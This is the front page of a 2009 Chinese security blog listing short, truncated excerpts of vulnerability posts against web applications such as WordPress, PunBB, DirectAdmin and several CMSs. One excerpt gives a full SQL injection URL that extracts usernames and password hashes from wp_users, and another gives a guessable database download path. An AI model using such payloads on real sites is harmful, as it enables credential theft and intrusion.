影子鹰安全网络-主站技术BLOG, 进阶式的学习平台...
 
用户登陆
用户:
密码:
   

站点日历
73 2009 - 9 48
  12345
6789101112
13141516171819
20212223242526
27282930

站点统计
日志:1320 篇
评论:3702 篇
引用:303812 个
会员:1170 人
留言:172 个
访问:18749317 次
今日:18670 平均:7000
建站:2001-10-10
在线人数: ?

最新评论

日志搜索

 标题   内容

友情链接
其他信息
影子鹰安全网络-主站技术BLOG
::订阅到抓虾::
订阅到飞鸽
订阅到GOOGLE
订阅到yahoo
订阅到ROJO
RSS 1.0
RSS 2.0
[全部订阅更新]
[鄂ICP备05002492号]
联系我

::影子鹰业务联系专用QQ:;

Gmail:coolkawen(at)Gmail.com站长KAWEN联系方式
QQ群(::Blog交流::)

旗下域名

www.cn9x.com
www.cnyzy.cn


FEED订阅数一览


EMAIL订阅FEED

[1] [2] [3] [4] [5] [6] [7] [8] [9] [10]  ... [23]  显示模式: 默认模式 | 树形模式
[置顶] 寻找台湾,韩国,国外合作伙伴!   [ 2009-07-31  |  影子鹰  | 晴天]   

寻求与台湾,韩国,国外公司或是个人或是团队的商业合作!我们拥有专业的计算机知识以及近十年的网络技术经验,拥有自已的专业积累数据库和资源。诚意找寻长期的合作伙伴。有意请直接联系QQ:635465491 注明:商业合作

阅读全文……
作者:kawen | 分类:专业出售 | 评论:0 | 引用:0 | 查看:609
晴天 DirectAdmin v1.34.0 XSRF   [ 2009-12-30 09:04:28  |  影子鹰 ]

DirectAdmin v1.34.0 XSRF Create Administrator Vulnerability 


view sourceprint?# Vendor: [http://www.directadmin.com/]  

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:249
晴天 PunBB官方上传附件扩展注射漏洞   [ 2009-12-30 09:00:15  |  影子鹰 ]

本来想给论坛加个上传附件的功能,从官方网站下了个pun_attachment,顺便看了下代码,结果发现了这个漏洞:p

if (isset($_GET['secure_str']))
{
    if (preg_match('~(\d+)f(\d+)~', $_GET['secure_str'], $match))

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:233

vCard PRO 3.1 Cross Site Scripting Vulnerability

# Exploit  :  

|  

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:253
晴天 DBHCMS   [ 2009-12-27 10:17:02  |  影子鹰 ]

DBHCMS - Web Content Management System v1.1.4 RFI Vulnerability 


# Exploit:   

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:259
晴天 创易网站管理系统CreateEasyCMS 0day   [ 2009-12-23 09:48:50  |  影子鹰 ]

创易网站管理系统CreateEasyCMS 0day
影响版本 1.0 sp1
存在问题的文件User\User_ChkInfo.asp 看这几句代码:

view plaincopy to clipboardprint?

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:278
晴天 Toast Forums v1.8 &8pixel.net 2009数据库   [ 2009-12-21 09:35:24  |  影子鹰 ]

8pixel.net 
http://[target].com/[path]/App_Data/sb.mdb 


Toast Forums v1.8

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:234
晴天 WordPress and Pyrmont V2. SQL   [ 2009-12-19 09:11:47  |  影子鹰 ]

WordPress and Pyrmont V2. SQL Injection Vulnerability

# Exploit:   

http://server/path/results.php?id=-9999+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users  

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:298
晴天 Sa-Upfile 1.0(sa权限上传文件)   [ 2009-12-17 09:28:13  |  影子鹰 ]

Sa-Upfile 1.0(sa权限上传文件)

使用环境:SQL2000,SA权限,常用提权扩展存在。

原理 :利用textcopy进行二进制导入导出。

阅读全文……
作者:kawen | 分类:资源共享 | 评论:0 | 引用:0 | 查看:354
晴天 phpFaber CMS - XSS Vulnerability   [ 2009-12-15 08:51:16  |  影子鹰 ]

phpFaber CMS - XSS Vulnerability 

 [x] Exploit :  

#  

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:258
晴天 Savant Web Server 3.1 Remote Exploit   [ 2009-12-15 08:50:05  |  影子鹰 ]

# Title: Savant Web Server 3.1 Remote Buffer Overflow Exploit 
# EDB-ID: 10434 
# CVE-ID: () 
# OSVDB-ID: () 
# Author: DouBle_Zer0 

阅读全文……
作者:kawen | 分类:资源共享 | 评论:0 | 引用:0 | 查看:310
晴天 讯时CMS-v3.7漏洞   [ 2009-12-13 09:42:58  |  影子鹰 ]

影响版本:3.7 至3.9通杀

漏洞描述:

我近来看见许多blog友人叫我多发这类漏洞文章,我今天在发一篇,我在站长之家发现这个无前台的程序,所以我下下来看看这程序安全性如何,而且这程序下载地人也较多,在站长之家的下载量达”讯时网站管理系统CMS下载地址(已被下载71216次) “我在http://down.chinaz.com/soft/14523.htm下载了这程序,在站长之家里面这程序是最新地,因为无前台,所以我直接跳到admin网站后台目录看代码,这套程序在安全性还是可以地,只是可能程序员疏忽所以出现问题了,我们来看admin目录下的admin_conn.asp 文件,这文件代码很简单就几句话,我们来看源码

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:292
[1] [2] [3] [4] [5] [6] [7] [8] [9] [10]  ... [23]  
  Powered by www.cnyzy.cn Rights © 2006 Processed in 0.203125 second(s) , 5 queries